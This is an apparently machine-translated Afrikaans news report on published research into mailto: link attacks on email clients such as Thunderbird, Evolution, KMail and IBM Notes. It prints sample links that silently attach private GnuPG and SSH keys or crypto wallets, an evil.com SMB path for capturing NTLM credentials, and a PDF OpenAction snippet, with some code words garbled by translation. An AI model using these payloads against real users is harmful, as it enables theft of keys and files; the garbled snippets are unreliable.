Navorsers van Ruhr Universiteit Bochum (Duitsland) () gedrag van poskliënte wanneer "mailto:"-skakels met gevorderde parameters verwerk word. Vyf van die twintig e-poskliënte wat ondersoek is, was kwesbaar vir 'n aanval wat hulpbronvervanging gemanipuleer het deur die "heg"-parameter te gebruik. 'n Bykomende ses e-poskliënte was kwesbaar vir 'n PGP- en S/MIME-sleutelvervangingsaanval, en drie kliënte was kwesbaar vir 'n aanval om die inhoud van geënkripteerde boodskappe te onttrek.
Skakels «"word gebruik om die opening van 'n e-poskliënt te outomatiseer om 'n brief te skryf aan die geadresseerde wat in die skakel gespesifiseer word. Benewens die adres, kan jy addisionele parameters as deel van die skakel spesifiseer, soos die onderwerp van die brief en 'n sjabloon vir tipiese inhoud. Die voorgestelde aanval manipuleer die "heg"-parameter, wat jou toelaat om 'n aanhangsel aan die gegenereerde boodskap te heg.
Poskliënte Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) en Pegasus Mail was kwesbaar vir 'n onbenullige aanval wat jou toelaat om outomaties aan te heg enige plaaslike lêer, gespesifiseer via 'n skakel soos "mailto:?attach=path_to_file". Die lêer word aangeheg sonder om 'n waarskuwing te vertoon, so sonder spesiale aandag sal die gebruiker dalk nie agterkom dat die brief met 'n aanhangsel gestuur sal word nie.
Gebruik byvoorbeeld 'n skakel soos "mailto:[e-pos beskerm]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" jy kan private sleutels van GnuPG in die brief invoeg. Jy kan ook die inhoud van kripto-beursies (~/.bitcoin/wallet.dat), SSH-sleutels (~/.ssh/id_rsa) en enige lêers wat vir die gebruiker toeganklik is, stuur. Boonop laat Thunderbird jou toe om groepe lêers aan te heg deur middel van konstruksies soos "attach=/tmp/*.txt".
Benewens plaaslike lêers, verwerk sommige e-poskliënte skakels na netwerkberging en paaie in die IMAP-bediener. In die besonder laat IBM Notes jou toe om 'n lêer vanaf 'n netwerkgids oor te dra wanneer skakels soos "attach=\\evil.com\dummyfile" verwerk word, asook om NTLM-verifikasieparameters te onderskep deur 'n skakel na 'n SMB-bediener te stuur wat deur die aanvaller beheer word (die versoek sal saam met die huidige verifikasieparametergebruiker gestuur word).
Thunderbird verwerk suksesvol versoeke soos "attach=imap:///fetch>UID>/INBOX>1/", wat jou toelaat om inhoud van dopgehou op die IMAP-bediener aan te heg. Terselfdertyd word boodskappe wat van IMAP herwin is, geïnkripteer via OpenPGP en S/MIME, outomaties deur die poskliënt gedekripteer voordat dit gestuur word. Die ontwikkelaars van Thunderbird was oor die probleem in Februarie en in die uitgawe die probleem is reeds reggestel (Thunderbird-takke 52, 60 en 68 bly kwesbaar).
Ou weergawes van Thunderbird was ook kwesbaar vir twee ander aanvalvariante op PGP en S/MIME wat deur die navorsers voorgestel is. In die besonder, Thunderbird, sowel as OutLook, PostBox, eM Client, MailMate en R2Mail2, was onderhewig aan 'n sleutelvervangingsaanval, veroorsaak deur die feit dat die poskliënt outomaties nuwe sertifikate invoer en installeer wat in S/MIME-boodskappe versend is, wat dit moontlik maak die aanvaller om die vervanging van publieke sleutels wat reeds deur die gebruiker gestoor is, te organiseer.
Die tweede aanval, waarvoor Thunderbird, PostBox en MailMate vatbaar is, manipuleer die kenmerke van die meganisme vir outo-stoor van konsepboodskappe en laat toe, met behulp van mailto-parameters, die dekripsie van geënkripteerde boodskappe of die byvoeging van 'n digitale handtekening vir arbitrêre boodskappe te begin, met daaropvolgende oordrag van die resultaat na die aanvaller se IMAP-bediener. In hierdie aanval word die syferteks deur die "liggaam"-parameter oorgedra, en die "meta-verfris"-merker word gebruik om 'n oproep na die aanvaller se IMAP-bediener te begin. Byvoorbeeld: ' '
Om outomaties "mailto:"-skakels sonder gebruikersinteraksie te verwerk, kan spesiaal ontwerpte PDF-dokumente gebruik word - die OpenAction-aksie in PDF laat jou toe om outomaties die mailto-hanteerder te begin wanneer 'n dokument oopgemaak word:
%PDF-1.5
1 objek
<< /Typ /Katalogus /OpenAction [2 0 R] >>
endobj
2 objek
<< /Typ /Aksie /S /URI/URI (mailto:?body=——BEGIN PGP-BOODSKAP——[…])>>
endobj
Bron: opennet.ru